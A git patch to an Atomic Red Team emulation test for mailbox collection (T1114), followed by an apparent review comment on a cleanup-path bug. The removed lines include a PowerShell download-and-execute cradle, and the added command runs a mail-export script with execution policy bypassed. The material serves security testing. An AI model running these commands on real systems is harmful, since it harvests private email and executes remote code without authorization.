From cf2879466d5c3edd7194339ff1e2bd3184e5f04b Mon Sep 17 00:00:00 2001
From: dwhite9
Date: Wed, 18 Dec 2019 00:44:35 -0600
Subject: [PATCH] T1114 Update (#730)

* Removed text "comments" that were attempting to run as commands. Simplified command block script execution. Added input arguments for save path for script output. added cleanup commands.
* Replaced hard coded command with $PathToAtomicsFolder variable.
---
 atomics/T1114/T1114.yaml | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

diff --git a/atomics/T1114/T1114.yaml b/atomics/T1114/T1114.yaml
index c7551369..d9bdd267 100644
--- a/atomics/T1114/T1114.yaml
+++ b/atomics/T1114/T1114.yaml
@@ -11,16 +11,15 @@ atomic_tests:
 supported_platforms:
 - windows
-
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: String
+ default: $home\desktop\mail.csv
 executor:
 name: command_prompt
 elevation_required: false
 command: |
- Display email contents in the terminal
- PS C:\> .\Get-Inbox.ps1
-
- Write emails out to a CSV
- PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
-
- Download and Execute
- "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')"
+ powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
+ cleanup_command: |
+ del #{output_file}
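Review bot: The cleanup step will not remove the exported mailbox when the default `output_file` is used. The executor is still `command_prompt`, so `del #{output_file}` runs in cmd.exe, which does not expand `$home` (unless the test runner substitutes it first, which the hunk does not show), and `del $home\desktop\mail.csv` then points at a relative path that does not exist. The CSV written by `Get-Inbox.ps1` would stay on the desktop after the test, leaving collected mail content on disk. A default that cmd.exe expands for both commands, `default: '%USERPROFILE%\desktop\mail.csv'`, together with `del "#{output_file}"`, would make the run and the cleanup agree; switching the executor to `powershell` is the other option. The unquoted `-file #{output_file}` on the command line also needs a check against profile paths that contain spaces.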